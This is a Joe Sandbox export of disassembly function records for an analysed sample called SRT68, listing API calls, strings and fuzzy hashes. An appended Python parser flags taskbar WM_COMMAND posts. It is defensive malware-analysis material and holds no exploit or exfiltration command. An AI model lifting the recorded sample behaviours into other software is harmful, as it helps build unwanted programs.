                                                                      • _memset.LIBCMT ref: 01002A22
                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01002A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                      • Instruction ID: dfa69ec7a49176f8699b7b6a4f76543d38eb7739b913d96bd5f97141604c1fd1
                                                                      • Opcode Fuzzy Hash: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                      • Instruction Fuzzy Hash: FF11B932901124ABFF76DE5CDC48BAE77F8AB46390F044091E9D5E72D0DB70A945C791
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101222C
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01012255
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                      • Instruction ID: 30191efc4627eecfa95bbd29f593842300d289fb36375a9199dcc2aa46e9ea2a
                                                                      • Opcode Fuzzy Hash: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                      • Instruction Fuzzy Hash: 75110270501225FADB258F158C88EFFFFA8FF06291F20826AFA8486004E2785894C6F0
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FF8E73
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
                                                                      • Instruction ID: 2ffc7940531c02fee8533ab013164aa29f6c58844a24a0d88aee2a14bcdc9efd
                                                                      • Opcode Fuzzy Hash: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
                                                                      • Instruction Fuzzy Hash: 8701F1B1A41219AB8B14EBE0CC41DFE7368EF0A360B100A09F9656B2E1DE39580CE650
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 1988441806-3962188686
                                                                      • Opcode ID: 43ca834e010af55c3873c75c67de72069bf5f0e04685280d75cb677ec698b73b
                                                                      • Instruction ID: ee3741144c25d59b86f5654ffedf26ff3f06f9cc79254e78a56f45f3a1040e9c
                                                                      • Opcode Fuzzy Hash: 43ca834e010af55c3873c75c67de72069bf5f0e04685280d75cb677ec698b73b
                                                                      • Instruction Fuzzy Hash: FA01F971C042187EDB19DAA9CC16FFE7BF8DB11701F00459FF592D2181E579E6049760
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FF8D6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                      • Instruction ID: 0e828ea2e0427c75c59f2ef43c025e7fc0375ee54f7d1e906345f63624ec73a6
                                                                      • Opcode Fuzzy Hash: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                      • Instruction Fuzzy Hash: AB01D4B1A4110DABCB24EBA0CD52EFF77A8DF1A390F100019B905672A1DE195E0CF271
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FF8DEE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                      • Instruction ID: 47d21ac87dbd655b76759542a53931bd4f88f30530b99acd26f28bb746a1b8a4
                                                                      • Opcode Fuzzy Hash: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                      • Instruction Fuzzy Hash: 8401A2B1A4110DA7DB25EBA4CD42EFF77ACDF16390F100019B945A72A2DE298E0DF271
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp
                                                                      • String ID: #32770
                                                                      • API String ID: 2292705959-463685578
                                                                      • Opcode ID: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                      • Instruction ID: 6fe23d54de6d20e493c9998c278bcf2140407e5cf80e333c5cd41b2698f15c8a
                                                                      • Opcode Fuzzy Hash: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                      • Instruction Fuzzy Hash: 49E0D8336002292BE730AA9AAC4AFA7F7FCEB45B70F01005BFD44D7041D565AB4587E0
                                                                      APIs
                                                                        • Part of subcall function 00FDB314: _memset.LIBCMT ref: 00FDB321
                                                                        • Part of subcall function 00FC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FDB2F0,?,?,?,00FA100A), ref: 00FC0945
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3158253471-631824599
                                                                      • Opcode ID: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                      • Instruction ID: 3987e6fc83d0ca67511c2f8893248d23edd2c54a569be5f9b96fdd37f6ca7d19
                                                                      • Opcode Fuzzy Hash: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                      • Instruction Fuzzy Hash: B1E065B0600302CBD7309F29E9047427AE8AF01794F058A6EE486C7745EBB9E408EBA1
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00FE1775
                                                                        • Part of subcall function 0101BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FE195E,?), ref: 0101BFFE
                                                                        • Part of subcall function 0101BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0101C010
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FE196D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                      • String ID: WIN_XPe
                                                                      • API String ID: 582185067-3257408948
                                                                      • Opcode ID: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                      • Instruction ID: 5c9a39efadd74ec8dafc6329771c6c908db397f8d09cd61e52d19ebb165bec2e
                                                                      • Opcode Fuzzy Hash: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                      • Instruction Fuzzy Hash: 33F0EDB1801149DFDB25DF92C594BECBBF8BB18701F640089E142A2194DB764F88EF60
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                      • Instruction ID: 56922b281b37a31d82cc4fb86904661d7fed76037d2f6615d19db82c8a0d2fc0
                                                                      • Opcode Fuzzy Hash: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                      • Instruction Fuzzy Hash: 3DD0C931384312B6E6B4BA719C0EFD77A24AF14B90F100829BBC9AA1C4C9F59800CB54
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010259AE
                                                                      • PostMessageW.USER32(00000000), ref: 010259B5
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                      • Instruction ID: 1a12597c1c7201f9bccd8c9dcdec4010ad85c1f96ff333ccbbfe9a7e752686f4
                                                                      • Opcode Fuzzy Hash: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                      • Instruction Fuzzy Hash: 3DD0C9313803127AE6B5BA719C0EFD77624AF15B90F100829BBC5AA1C4C9F5A800CB54
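The function records above (APIs, Strings, Memory Dump Source, Similarity) are easier to triage when parsed than when read one block at a time: the record with IsDebuggerPresent + OutputDebugStringW is ordinary ATL runtime code (CAtlBaseModule), while the two FindWindowW(Shell_TrayWnd) + PostMessageW records are the interesting ones, since posting WM_COMMAND (0x111) to the tray window is the technique AutoIt's WinMinimizeAll uses to drive the shell's own taskbar commands. The following parser is an editor-added example, not Joe Sandbox code; the SAMPLE text is copied from two of the records above (with the "Associated:" dump lines left out), and the record layout it assumes is exactly the one shown on this page.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Memory Dump Source /
Similarity lists) into dicts so API + string patterns and instruction fuzzy
hashes can be queried across a dump. Editor-added example, not Joe Sandbox code."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: two records copied from this report's text export.
SAMPLE = """\
APIs
  • Part of subcall function 00FDB314: _memset.LIBCMT ref: 00FDB321
  • Part of subcall function 00FC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FDB2F0,?,?,?,00FA100A), ref: 00FC0945
• IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• Instruction Fuzzy Hash: B1E065B0600302CBD7309F29E9047427AE8AF01794F058A6EE486C7745EBB9E408EBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
  • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: 3DD0C931384312B6E6B4BA719C0EFD77A24AF14B90F100829BBC9AA1C4C9F59800CB54
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"  # indented sub-call lines
    r"(?P<name>[\w$@?]+)\.(?P<module>\w+)"                         # e.g. PostMessageW.USER32
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"         # args optional: _memset.LIBCMT ref: ...
)


def parse_records(text: str) -> List[Dict]:
    """Split the text export into one dict per function record (a record opens with 'APIs')."""
    records: List[Dict] = []
    rec: Optional[Dict] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "source": {}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue  # blank lines and page residue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                call = m.groupdict()
                # Arguments are comma separated; '?' marks an argument the sandbox did not recover.
                call["args"] = call["args"].split(",") if call["args"] is not None else []
                rec["apis"].append(call)
        elif section == "Strings":
            text_, _, xref = item.partition(", xrefs: ")
            rec["strings"].append({"text": text_, "xrefs": xref.split(", ") if xref else []})
        elif section == "Similarity":
            key, _, value = item.partition(": ")
            rec["similarity"][key] = value
        elif section == "Memory Dump Source":
            key, _, value = item.partition(": ")
            rec["source"].setdefault(key, []).append(value)
    return records


def direct_calls(rec: Dict) -> List[Dict]:
    """Calls made by the function itself, excluding those attributed to sub-calls."""
    return [c for c in rec["apis"] if c["parent"] is None]


WM_COMMAND = 0x111


def tray_wm_command_posts(records: List[Dict]) -> List[Tuple[str, int]]:
    """(ref, wParam) for each function that resolves Shell_TrayWnd and then posts WM_COMMAND
    to it: the shell-command trick behind AutoIt's WinMinimizeAll. wParam is the taskbar
    command id the shell is asked to run (0x197 in this sample)."""
    hits = []
    for rec in records:
        calls = direct_calls(rec)
        if not any(c["name"] == "FindWindowW" and "Shell_TrayWnd" in c["args"] for c in calls):
            continue
        for c in calls:
            if c["name"] != "PostMessageW" or len(c["args"]) < 3:
                continue  # e.g. the 010259AE record, where only one argument was recovered
            try:
                msg, wparam = int(c["args"][1], 16), int(c["args"][2], 16)
            except ValueError:
                continue  # unrecovered ('?') argument
            if msg == WM_COMMAND:
                hits.append((c["ref"], wparam))
    return hits


def fuzzy_hashes(records: List[Dict]) -> Dict[str, str]:
    """Instruction fuzzy hash -> API ID, the pair used to match functions across samples."""
    return {r["similarity"]["Instruction Fuzzy Hash"]: r["similarity"]["API ID"]
            for r in records if "Instruction Fuzzy Hash" in r["similarity"]}
```

Run `parse_records` over the full text export and feed the result to `tray_wm_command_posts` to list every function that drives the taskbar this way, and to `fuzzy_hashes` to collect the instruction fuzzy hashes for matching against other dumps; the parser deliberately skips lines that do not start with a bullet, so stray page text between records does not break it.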